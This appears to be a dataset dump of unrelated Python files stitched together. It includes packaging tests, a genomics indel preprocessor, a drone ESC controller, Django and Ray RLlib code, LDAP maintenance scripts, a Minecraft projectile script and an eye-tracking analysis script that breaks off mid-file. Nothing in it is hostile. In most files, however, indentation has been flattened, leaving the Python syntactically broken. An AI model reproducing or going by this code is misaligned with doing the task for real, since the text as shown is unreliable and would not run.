def test_editable_expose_hide(tmp_path, project):
# install to a virtual environment
result = make_venv(tmp_path / "venv")
for name, code in build_editable(project, expose=["foo"], hide=["foo.bar"]):
(result.creator.purelib / name).write_text(code, encoding="utf-8")
# test it works
run(result.creator.exe, "-c", "import foo; print(foo)")
    with pytest.raises(subprocess.CalledProcessError) as excinfo:
        run(result.creator.exe, "-c", "import foo.bar")
    assert "foo.bar is excluded from packaging" in excinfo.value.stderr
def test_editable_hide_none(tmp_path, project):
# install to a virtual environment
result = make_venv(tmp_path / "venv")
for name, code in build_editable(project, expose=["foo"]):
(result.creator.purelib / name).write_text(code)
# test that both foo and foo.bar are exposed
run(result.creator.exe, "-c", "import foo; print(foo)")
run(result.creator.exe, "-c", "import foo.bar; print(foo.bar)")
def test_editable_defaults(tmp_path, project):
# install to a virtual environment
result = make_venv(tmp_path / "venv")
for name, code in build_editable(project):
(result.creator.purelib / name).write_text(code)
# test that both foo and foo.bar are exposed
run(result.creator.exe, "-c", "import foo; print(foo)")
run(result.creator.exe, "-c", "import foo.bar; print(foo.bar)")
|
StarcoderdataPython
|
112843
|
<filename>rnaindel/analysis/preprocessor.py
import os
import csv
import pysam
import pandas as pd
from functools import partial
from multiprocessing import Pool
from indelpost import Variant, VariantAlignment
from .callset_formatter import format_callset
from .coding_indel import annotate_coding_info
from .transcript_feature_calculator import transcript_features
from .alignment_feature_calculator import alignment_features
from .database_feature_calculator import database_features
CANONICALS = [str(i) for i in range(1, 23)] + ["X", "Y"]
def preprocess(
tmp_dir,
fasta_file,
bam_file,
data_dir,
mapq,
num_of_processes,
region,
external_vcf,
pass_only,
):
if num_of_processes == 1:
callset = format_callset(tmp_dir, external_vcf, pass_only, region)
df = calculate_features(
callset, fasta_file, bam_file, data_dir, mapq, external_vcf
)
else:
callsets_by_chrom = format_callset(tmp_dir, external_vcf, pass_only, region)
pool = Pool(num_of_processes)
dfs = pool.map(
partial(
calculate_features,
fasta_file=fasta_file,
bam_file=bam_file,
data_dir=data_dir,
mapq=mapq,
external_vcf=external_vcf,
),
callsets_by_chrom,
)
df = pd.concat(dfs)
return df
def calculate_features(callset, fasta_file, bam_file, data_dir, mapq, external_vcf):
path_to_coding_gene_db = "{}/refgene/refCodingExon.bed.gz".format(data_dir)
path_to_proteindb = "{}/protein/proteinConservedDomains.txt".format(data_dir)
path_to_dbsnp = "{}/dbsnp/dbsnp.indel.vcf.gz".format(data_dir)
path_to_clinvar = "{}/clinvar/clinvar.indel.vcf.gz".format(data_dir)
path_to_cosmic = "{}/cosmic/CosmicCodingMuts.indel.vcf.gz".format(data_dir)
df = filter_non_coding_indels(
callset, fasta_file, path_to_coding_gene_db, external_vcf
)
if len(df) > 0:
df = transcript_features(df, path_to_proteindb)
df = alignment_features(df, bam_file, mapq)
if len(df) > 0:
return database_features(df, path_to_dbsnp, path_to_clinvar, path_to_cosmic)
return make_empty_df()
def filter_non_coding_indels(callset, fasta_file, path_to_coding_gene_db, external_vcf):
reference = pysam.FastaFile(fasta_file)
coding_gene_db = pysam.TabixFile(path_to_coding_gene_db)
coding_indels = []
is_prefixed = reference.references[0].startswith("chr")
with open(callset) as f:
records = csv.DictReader(f, delimiter="\t")
for record in records:
try:
indel, origin = bambino2variant(record, reference, is_prefixed)
update_coding_indels(coding_indels, indel, origin, coding_gene_db)
except:
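                # silently skip records that fail to convert (e.g. non-canonical
                # chromosomes or malformed lines)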
pass
if coding_indels:
df = pd.DataFrame(coding_indels)
if external_vcf:
dfg = df.groupby(["chrom", "pos", "ref", "alt"])
df = dfg.apply(summarize_caller_origin)
df = df.drop_duplicates(subset=["chrom", "pos", "ref", "alt", "origin"])
return df
else:
header = ["empty"]
return pd.DataFrame(columns=header)
def update_coding_indels(coding_indels, indel, origin, coding_gene_db):
coding_annotations = annotate_coding_info(indel, coding_gene_db)
if coding_annotations:
d = {
"indel": indel,
"chrom": indel.chrom,
"pos": indel.pos,
"ref": indel.ref,
"alt": indel.alt,
"coding_indel_isoforms": coding_annotations,
"origin": origin,
}
coding_indels.append(d)
def summarize_caller_origin(df_groupedby_indel):
origins = set(df_groupedby_indel["origin"].to_list())
if len(origins) > 1:
df_groupedby_indel["origin"] = "both"
return df_groupedby_indel
def bambino2variant(record, reference, is_prefixed):
chrom = record["Chr"].replace("chr", "")
    if chrom not in CANONICALS:
return None
chrom = "chr" + chrom if is_prefixed else chrom
pos = int(record["Pos"])
ref = record["Chr_Allele"]
alt = record["Alternative_Allele"]
var_type = record["Type"]
origin = "external"
if var_type in ["deletion", "insertion"]:
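        # built-in (bambino) calls lack the VCF padding base: shift the position one
        # base left and prepend the reference base to ref/alt below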
origin = "built_in"
pos -= 1
padding_base = reference.fetch(chrom, pos - 1, pos)
if var_type == "deletion":
alt = padding_base
ref = alt + ref
else:
ref = padding_base
alt = ref + alt
return Variant(chrom, pos, ref, alt, reference).normalize(), origin
def make_empty_df():
header = [
"indel",
"origin",
"chrom",
"pos",
"ref",
"alt",
"annotation",
"cds_length",
"indel_location",
"is_inframe",
"is_splice",
"is_truncating",
"is_nmd_insensitive",
"is_in_cdd",
"gene_symbol",
"ipg",
"repeat",
"lc",
"local_lc",
"gc",
"local_gc",
"strength",
"local_strength",
"dissimilarity",
"indel_complexity",
"indel_size",
"is_ins",
"is_at_ins",
"is_at_del",
"is_gc_ins",
"is_gc_del",
"ref_count",
"alt_count",
"orig_ref_cnt",
"orig_alt_cnt",
"is_bidirectional",
"is_uniq_mapped",
"uniq_mapping_rate",
"is_near_boundary",
"equivalence_exists",
"is_multiallelic",
"cplx_variant",
"dbsnp",
"pop_freq",
"is_common",
"is_on_db",
"is_pathogenic",
"cosmic_cnt",
]
return pd.DataFrame(columns=header)
|
StarcoderdataPython
|
1759731
|
<reponame>Sokrates80/air-py
"""
airPy is a flight controller based on pyboard and written in micropython.
The MIT License (MIT)
Copyright (c) 2016 <NAME>, <EMAIL>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from pyb import Pin, Timer
import utils.airpy_logger as logger
import array
class EscController:
def __init__(self, config_m, pwm_rate):
# ESC parameters
self.esc_pwm_min_cmd = config_m.get_param_set('esc', 'esc_pwm_min_cmd')
self.esc_pwm_center = config_m.get_param_set('esc', 'esc_pwm_center')
self.esc_pwm_min = config_m.get_param_set('esc', 'esc_pwm_min')
self.esc_pwm_max = config_m.get_param_set('esc', 'esc_pwm_max')
self.esc_low_range = self.esc_pwm_center - self.esc_pwm_min
self.esc_high_range = self.esc_pwm_max - self.esc_pwm_center
self.esc_full_range = self.esc_pwm_max - self.esc_pwm_min
self.tmp_pwm = None
# Threshold at 10% for the PID start working
self.esc_pid_threshold = int(0.1*(self.esc_pwm_max - self.esc_pwm_min)) + self.esc_pwm_min
# PWM initialization TODO: hexacopter handling
self._num_motors = config_m.get_param('num_motors')
self.pulse_widths = array.array('H', [0, 0, 0, 0]) # TODO: initialize based on # of motors
# TODO: GENERALIZE
# set PWM to 400Hz TODO: set freq according to settings
self._timers = [Timer(config_m.get_param_set('esc', 'quadcopter')['timers'][index],
prescaler=83, period=2499) for index in range(0, self._num_motors)]
self._escs = [self._timers[index].channel(config_m.get_param_set('esc',
'quadcopter')['channels'][index],
Timer.PWM,
pin=Pin(config_m.get_param_set('esc',
'quadcopter')['pins'][index]
)
) for index in range(0, self._num_motors)]
logger.info("Esc Controller Started")
def set_thrust_passthrough(self, pwm):
for j in range(0, self._num_motors):
self._escs[j].pulse_width(pwm)
def set_zero_thrust(self):
# set the thrust of all the motors to 0. Used for esc setup
self.pulse_widths = [self.esc_pwm_min_cmd for i in range(0, self._num_motors)] # used for aplink report
for j in range(0, self._num_motors):
self._escs[j].pulse_width(self.esc_pwm_min_cmd)
def set_thrust(self, widths):
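        # mix the four command channels into one pulse width per motor and clamp
        # each value to [esc_pwm_min, esc_pwm_max] before driving the ESC channels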
self.pulse_widths = [min(max(self.esc_pwm_min, widths[0] - widths[1] - widths[2] - widths[3]), self.esc_pwm_max),
min(max(self.esc_pwm_min, widths[0] + widths[1] + widths[2] - widths[3]), self.esc_pwm_max),
min(max(self.esc_pwm_min, widths[0] - widths[1] + widths[2] + widths[3]), self.esc_pwm_max),
min(max(self.esc_pwm_min, widths[0] + widths[1] - widths[2] + widths[3]), self.esc_pwm_max)]
for k in range(0, self._num_motors):
self._escs[k].pulse_width(self.pulse_widths[k])
|
StarcoderdataPython
|
4830297
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from marionette.by import By
from gaiatest import GaiaTestCase
from gaiatest.apps.homescreen.app import Homescreen
MANIFEST = 'http://mozqa.com/data/webapps/mozqa.com/manifest.webapp'
APP_NAME = 'Mozilla QA WebRT Tester'
TITLE = 'Index of /data'
class TestLaunchApp(GaiaTestCase):
_confirm_install_button_locator = (By.ID, 'app-install-install-button')
_header_locator = (By.CSS_SELECTOR, 'h1')
def setUp(self):
GaiaTestCase.setUp(self)
self.connect_to_network()
self.homescreen = Homescreen(self.marionette)
self.homescreen.launch()
# Install app
self.marionette.switch_to_frame()
self.marionette.execute_script(
'navigator.mozApps.install("%s")' % MANIFEST)
# Confirm the installation and wait for the app icon to be present
self.wait_for_element_displayed(*self._confirm_install_button_locator)
self.marionette.find_element(*self._confirm_install_button_locator).tap()
self.homescreen.switch_to_homescreen_frame()
self.homescreen.wait_for_app_icon_present(APP_NAME)
def test_launch_app(self):
# Verify that the app icon is visible on one of the homescreen pages
self.assertTrue(self.homescreen.is_app_installed(APP_NAME),
"App %s not found on Homescreen" % APP_NAME)
# Click icon and wait for h1 element displayed
self.homescreen.installed_app(APP_NAME).tap_icon()
self.wait_for_element_displayed(*self._header_locator, timeout=20)
self.assertEqual(self.marionette.find_element(*self._header_locator).text, TITLE)
def tearDown(self):
self.apps.uninstall(APP_NAME)
GaiaTestCase.tearDown(self)
|
StarcoderdataPython
|
150464
|
#!/usr/bin/env python3
import sys
import click
import check_entry_mariadb
import delete_old_entries
import detect_ldap_problems
# aliased imports: the click commands defined below reuse these module names
import fix_wrong_format as fix_wrong_format_module
import update_password_fields as update_password_fields_module
import delete_userpassword_cram
from config_loader import load_config
from common import LOGGER
@click.group()
def cli():
"""CLI for submit lock accounts """
pass
@cli.command()
@click.argument('input_file')
@click.option('--limit_days_ago', default=None)
@click.option('--number_of_accounts', default=None)
def delete_submit_locks(input_file, limit_days_ago, number_of_accounts):
"""Delete entries in ldap older than limit_days_ago before today
:param input_file: File generated by check_submit_locks
:param limit_days_ago: Date limit in days before current date to delete lock = submit
:param number_of_accounts: Number of accounts to delete lock = submit
"""
delete_old_entries.delete_old_entries(input_file, number_of_accounts=number_of_accounts,
limit_days_ago=limit_days_ago)
@cli.command()
@click.argument('input_file')
@click.argument('pattern')
def detect_wrong_format(input_file, pattern):
"""Delete entries in ldap older than limit_days_ago before today
:param input_file: Ldap dumb file to parse
:param pattern: Pattern to be detected, it must be defined in config.yml!
"""
cfg = load_config()
try:
cfg[pattern]
except KeyError:
LOGGER.error("Pattern not found in the config.yml file!")
sys.exit(1)
else:
detect_ldap_problems.detect_wrong_format(cfg[pattern], input_file)
@cli.command()
@click.argument('input_file')
def delete_user_password_cram(input_file):
"""Delete userpasswordcram in ldap
:param input_file: Ldap dumb file to parse
"""
delete_userpassword_cram.delete_userpassword_cram(input_file)
@cli.command()
@click.argument('input_file')
@click.option('--number_of_accounts', default=10)
def fix_wrong_format(input_file, number_of_accounts):
"""Delete entries in ldap older than limit_days_ago before today
:param input_file: File with the broken accounts ()
:param number_of_accounts: Number of accounts to fix
"""
fix_wrong_format.fix_wrong_format(input_file, number_of_accounts=number_of_accounts)
@cli.command()
@click.argument('input_file')
@click.option('--number_of_accounts', default=None)
@click.option('--first_account', default=0)
def update_password_fields(input_file, number_of_accounts, first_account):
"""Updates password fields in ldap using requests to PMAPI
:param input_file: Ldap dumb file to parse
:param number_of_accounts: Number of accounts to update
:param first_account: First account in the dump file to start updating
"""
    update_password_fields_module.update(
        input_file, number_of_accounts=number_of_accounts, first_account=first_account)
if __name__ == '__main__':
cli()
|
StarcoderdataPython
|
85964
|
<reponame>Cray-HPE/hms-capmc<filename>test/python/test_getXnameStatusByCLIBad.py
#!/usr/bin/python3
# MIT License
#
# (C) Copyright [2019-2021] Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
"""
Test case for getXnameStatusByCLIBad
"""
from subprocess import Popen, PIPE
from shlex import split
from sys import exit
from re import search
################################################################################
#
# getXnameStatusByCLIBad
#
################################################################################
def getXnameStatusByCLIBad():
TEST = "getNodeStatusByCLIBad"
xnames = "x99999c9s9b0n9"
CMD = "cray capmc get_xname_status create --xnames "+xnames
print("["+TEST+"] Checks the status of invalid xname: "+CMD)
process = Popen(split(CMD), stdout=PIPE, stderr=PIPE)
process.wait()
_, stderr = process.communicate()
if process.returncode != 0:
errstr = stderr.decode("utf-8")
if search("400 Client Error", errstr):
print("["+TEST+"] PASS: Received expected 400 Client Error.")
return 0
print("["+TEST+"] FAIL: "+errstr+", expected 400 Client Error.")
return 1
print("["+TEST+"] FAIL: No error, expected 400 Client Error")
return 1
def test_getXnameStatusByCLIBad():
assert getXnameStatusByCLIBad() == 0
if __name__ == "__main__":
ret = getXnameStatusByCLIBad()
exit(ret)
|
StarcoderdataPython
|
3223272
|
"""Example of using a custom model with batch norm."""
import argparse
import ray
from ray import tune
from ray.rllib.models import ModelCatalog
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.utils import try_import_tf
from ray.rllib.utils.annotations import override
tf = try_import_tf()
parser = argparse.ArgumentParser()
parser.add_argument("--num-iters", type=int, default=200)
parser.add_argument("--run", type=str, default="PPO")
class BatchNormModel(TFModelV2):
"""Example of a TFModelV2 that is built w/o using tf.keras.
NOTE: This example does not work when using a keras-based TFModelV2 due
to a bug in keras related to missing values for input placeholders, even
though these input values have been provided in a forward pass through the
actual keras Model.
All Model logic (layers) is defined in the `forward` method (incl.
the batch_normalization layers). Also, all variables are registered
(only once) at the end of `forward`, so an optimizer knows which tensors
to train on. A standard `value_function` override is used.
"""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
# Have we registered our vars yet (see `forward`)?
self._registered = False
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
last_layer = input_dict["obs"]
hiddens = [256, 256]
with tf.variable_scope("model", reuse=tf.AUTO_REUSE):
for i, size in enumerate(hiddens):
last_layer = tf.layers.dense(
last_layer,
size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name="fc{}".format(i))
# Add a batch norm layer
last_layer = tf.layers.batch_normalization(
last_layer,
training=input_dict["is_training"],
name="bn_{}".format(i))
output = tf.layers.dense(
last_layer,
self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="out")
self._value_out = tf.layers.dense(
last_layer,
1,
kernel_initializer=normc_initializer(1.0),
activation=None,
name="vf")
if not self._registered:
self.register_variables(
tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES, scope=".+/model/.+"))
self._registered = True
return output, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
class KerasBatchNormModel(TFModelV2):
"""Keras version of above BatchNormModel with exactly the same structure.
    IMPORTANT NOTE: This model will not work with PPO due to a bug in keras
that surfaces when having more than one input placeholder (here: `inputs`
and `is_training`) AND using the `make_tf_callable` helper (e.g. used by
PPO), in which auto-placeholders are generated, then passed through the
    tf.keras.models.Model. In this last step, the connection between 1) the
provided value in the auto-placeholder and 2) the keras `is_training`
Input is broken and keras complains.
Use the above `BatchNormModel` (a non-keras based TFModelV2), instead.
"""
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
inputs = tf.keras.layers.Input(shape=obs_space.shape, name="inputs")
is_training = tf.keras.layers.Input(
shape=(), dtype=tf.bool, batch_size=1, name="is_training")
last_layer = inputs
hiddens = [256, 256]
for i, size in enumerate(hiddens):
label = "fc{}".format(i)
last_layer = tf.keras.layers.Dense(
units=size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name=label)(last_layer)
# Add a batch norm layer
last_layer = tf.keras.layers.BatchNormalization()(
last_layer, training=is_training[0])
output = tf.keras.layers.Dense(
units=self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="fc_out")(last_layer)
value_out = tf.keras.layers.Dense(
units=1,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="value_out")(last_layer)
self.base_model = tf.keras.models.Model(
inputs=[inputs, is_training], outputs=[output, value_out])
self.register_variables(self.base_model.variables)
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
out, self._value_out = self.base_model(
[input_dict["obs"], input_dict["is_training"]])
return out, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
if __name__ == "__main__":
args = parser.parse_args()
ray.init()
ModelCatalog.register_custom_model("bn_model", BatchNormModel)
config = {
"env": "Pendulum-v0" if args.run == "DDPG" else "CartPole-v0",
"model": {
"custom_model": "bn_model",
},
"num_workers": 0,
}
tune.run(
args.run,
stop={"training_iteration": args.num_iters},
config=config,
)
|
StarcoderdataPython
|
1729790
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-07-19 01:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('webapp', '0002_auto_20160719_0131'),
]
operations = [
migrations.CreateModel(
name='Team',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('conference', models.CharField(choices=[('EC', 'EASTERN'), ('WC', 'WESTERN')], default='EC', max_length=2, verbose_name='Conference')),
('name', models.CharField(max_length=64, verbose_name='Name')),
('arena', models.CharField(max_length=64, verbose_name='Arena')),
('foundation', models.DateField(verbose_name='Foundation')),
('about_history', models.TextField(verbose_name='About/History')),
],
options={
'verbose_name': 'Team',
'verbose_name_plural': 'Teams',
},
),
]
|
StarcoderdataPython
|
3312863
|
#
# Code by <NAME> and under the MIT license
#
#
# python grenade.py [speed [gravity]]
#
# Throws a grenade with the specified speed in m/s (default: 15) and specified
# gravitational acceleration (default: earth) in m/s^2 or given by listing a planet,
# sun, moon or pluto.
#
from mine import *
from vehicle import *
import time
import sys
GRAVITIES = {
'sun':274,
'mercury':3.59,
'venus':8.87,
'earth':9.81,
'moon':1.62,
'mars':3.77,
'jupiter':25.95,
'saturn':11.08,
'uranus':10.67,
'neptune':14.07,
'pluto':0.42
}
def getPath(center, azi, alt, v0):
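    # integrate simple projectile motion (gravity only) from just in front of the
    # player, stepping roughly half a block at a time, until a non-air block is hit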
vx = v0 * cos(alt) * sin(-azi)
vy = v0 * sin(alt)
vz = v0 * cos(alt) * cos(-azi)
t = 0
x = center.x + cos(alt) * sin(-azi) * 2
y = center.y + sin(alt) * 2 + 2
z = center.z + cos(alt) * cos(-azi) * 2
path = [(t,Vec3(round(x),round(y),round(z)))]
while not mc.getBlock(x,y,z):
v = sqrt(vx*vx+vy*vy+vz*vz)
if v < 1:
dt = 0.5
else:
dt = 0.5/v
v1x = vx
v1y = vy - g * dt
v1z = vz
x += (vx+v1x)/2 * dt
y += (vy+v1y)/2 * dt
z += (vz+v1z)/2 * dt
vx = v1x
vy = v1y
vz = v1z
t += dt
path.append( ( t,Vec3(round(x),round(y),round(z)) ) )
return path
def getXYZ(path, t1):
for t,xyz in path:
if t1<=t:
return xyz
return path[-1][1]
mc = Minecraft()
try:
v0 = int(sys.argv[1])
except:
v0 = 15
if 3 <= len(sys.argv):
try:
g = float(sys.argv[2])
except:
g = GRAVITIES[sys.argv[2].lower()]
else:
g = GRAVITIES['earth']
center = mc.player.getPos()
azi = mc.player.getRotation() * pi/180.
alt = -mc.player.getPitch() * pi/180.
GRENADE = { (-1,0,0):block.TNT, (1,0,0):block.TNT, (0,-1,0):block.TNT, (0,1,0):block.TNT, (0,0,1):block.TNT, (0,0,-1):block.TNT }
grenade = Vehicle(mc, False)
grenade.setVehicle(GRENADE)
path = getPath(center, azi, alt, v0)
dictionary = {}
prev = path[0][1]
grenade.draw(prev.x,prev.y,prev.z)
t0 = time.time()
while True:
t = time.time() - t0
pos = getXYZ(path,t)
grenade.moveTo(pos.x,pos.y,pos.z)
prev=pos
time.sleep(0.1)
if t > path[-1][0]:
break
mc.setBlock(path[-1][1],block.FIRE)
|
StarcoderdataPython
|
1713003
|
from PyQt4 import QtGui
import sys
from views import base
class ExampleApp(QtGui.QMainWindow, base.Ui_MainWindow):
def __init__(self, parent=None):
super(ExampleApp, self).__init__(parent)
self.setupUi(self)
def main():
app = QtGui.QApplication(sys.argv)
form = ExampleApp()
form.show()
app.exec_()
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1640440
|
from django.test import SimpleTestCase
from cpu.random import Random
from game.transforms import Board
def sample_input():
return [
'x', 'x', ' ',
'o', ' ', ' ',
'o', ' ', 'x',
]
class RandomAiTest(SimpleTestCase):
def test_picks_random(self):
data = sample_input()
ai = Random()
move = ai.play(Board(data), 'x', 'o')
        self.assertEqual(data[move], ' ')
def test_get_name(self):
ai = Random()
self.assertRegex(ai.name().upper(), '.*RANDOM.*')
|
StarcoderdataPython
|
3382818
|
"""example URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
from django.contrib.auth import views as auth_views
from .views import (ExampleJobLogView, ExampleJobStatusView, IndexView,
JobDetail, JobList, ServerDetail, ServerList)
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', IndexView.as_view(), name='index'),
# Login
url(r'^accounts/login/$', auth_views.login, {'template_name': 'login.html'}, name='login'),
url(r'^logout/$', auth_views.logout, {'template_name': 'logged_out.html'}, name='logout'),
# Live job status
url(r'^example/$', ExampleJobStatusView.as_view(), name='example'),
url(r'^logs/(?P<job_pk>[0-9]+)/$', ExampleJobLogView.as_view(), name='logs'),
url(r'^servers/$', ServerList.as_view(), name='server-list'),
url(r'^servers/(?P<pk>[0-9]+)/$', ServerDetail.as_view(), name='server-detail'),
url(r'^jobs/$', JobList.as_view(), name='job-list'),
url(r'^api/', include('django_remote_submission.urls')),
]
# Serving files uploaded by a user during development
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
StarcoderdataPython
|
4809366
|
#!/usr/bin/env python
# encoding: utf-8
"""
first_level_control.py
If used, please cite:
<NAME>., <NAME>., <NAME>. & <NAME>.
Task-evoked pupil responses reflect internal belief states. Scientific Reports 8, 13702 (2018).
"""
import os, sys, datetime
import subprocess, logging
import scipy as sp
import scipy.stats as stats
import numpy as np
import matplotlib.pylab as pl
from IPython import embed as shell
this_raw_folder = '/home/raw/'
this_project_folder = '/home/control'
analysisFolder = os.path.join(this_project_folder, 'analysis')
sys.path.append( analysisFolder )
sys.path.append( os.environ['ANALYSIS_HOME'] )
from Tools.Sessions import *
from Tools.Run import *
import pupil_data_analysis_control
# -----------------
# Comments: -
# -----------------
subjects = ['sub-16','sub-17','sub-18','sub-19','sub-20','sub-21','sub-05','sub-22','sub-23','sub-24','sub-09','sub-25','sub-26','sub-27','sub-28']
for which_subject in subjects:
sessions = [1]
edfs = []
for s in sessions:
def runWholeSession( rDA, session ):
for r in rDA:
thisRun = Run( **r )
presentSession.addRun(thisRun)
session.parcelateConditions()
session.parallelize = True
# initialize pupil session:
global edfs
edfs.append( [rDA[i]['eyeLinkFilePath'] for i in range(len(rDA)) if rDA[i]['condition'] == 'task'] )
if s == 1:
edfs = list(np.concatenate(edfs))
aliases = []
for i in range(len(edfs)):
session = int(edfs[i].split('_s')[1][0])
aliases.append('feedback_{}_{}'.format(i+1, session))
print aliases
subject = Subject(which_subject, '?', None, None, None)
experiment = 1
version = 2
## preprocessing:
pupilPreprocessSession = pupil_data_analysis_control.pupilPreprocessSession(subject=subject, experiment_name='pupil_feedback', experiment_nr=experiment, version=version, sample_rate_new=50, project_directory=this_project_folder)
pupilPreprocessSession.import_raw_data(edf_files=edfs, aliases=aliases)
pupilPreprocessSession.convert_edfs(aliases)
## pupilPreprocessSession.delete_hdf5() # run if need to redo HDF5 files
pupilPreprocessSession.import_all_data(aliases)
for alias in aliases:
pupilPreprocessSession.process_runs(alias, artifact_rejection='not_strict', create_pupil_BOLD_regressor=False)
pass
pupilPreprocessSession.process_across_runs(aliases, create_pupil_BOLD_regressor=False)
# for testing;
if __name__ == '__main__':
####################################################################################################################################################################################
if which_subject == 'sub-16':
# subject information
initials = 'sub-16'
firstName = 'sub-16'
standardFSID = 'sub-16_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 21)
sj_session1 = 'sub-16_210617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-16_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-17':
# subject information
initials = 'sub-17'
firstName = 'sub-17'
standardFSID = 'sub-17_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
